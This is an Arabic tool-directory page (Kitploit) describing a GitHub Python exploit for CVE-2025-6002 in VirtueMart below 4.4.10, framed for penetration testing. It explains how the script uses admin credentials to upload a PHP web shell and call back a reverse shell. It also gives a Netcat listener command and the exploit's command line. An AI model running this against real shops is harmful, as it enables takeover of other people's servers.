Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/schn1tzelme1ster/cve-2025-6002
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubschn1tzelme1ster/cve-2025-6002

CVE-2025-6002

استغلال بايثون لـ CVE-2025-6002 يستهدف رفع الملفات التعسفي المصادق عليه في VirtueMart < 4.4.10. يسجل الدخول، ويرفع قشرة ويب PHP، ويطلق قشرة عكسية لاختبار الاختراق.

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2025-6002

يستغل هذا السكربت ثغرة رفع الملفات الاعتباطية بعد المصادقة في VirtueMart < 4.4.10 (CVE-2025-6002)، والموصوفة في هذه التدوينة: https://blog.blacklanternsecurity.com/p/doomla-zero-days

يسجّل هذا السكربت الدخول إلى VirtueMart باستخدام بيانات الاعتماد المقدمة، وينشئ منتجًا جديدًا ويرفع قشرة ويب PHP كملف وسائط. ثم يستدعي قشرة عكسية إلى عنوان IP/المنفذ المقدم.

المعلمات:

  • --url: رابط VirtueMart
  • --username: اسم مستخدم المسؤول
  • --password: كلمة مرور المسؤول
  • --remote-ip: عنوان IP للمهاجمhttps://github.com/schn1tzelme1ster/CVE-2025-6002/tree/main
  • --remote-port: منفذ المهاجم

الاستخدام:

  1. شغّل Netcat على جهاز المهاجم:
root@kitploit:~
nc -nlvp 1337
  1. نفّذ الاستغلال
root@kitploit:~
python3 exploit.py --url http://x.x.x.x --username admin --password kartoffel --remote-ip x.x.x.x --remote-port 1337
تنزيل الأداة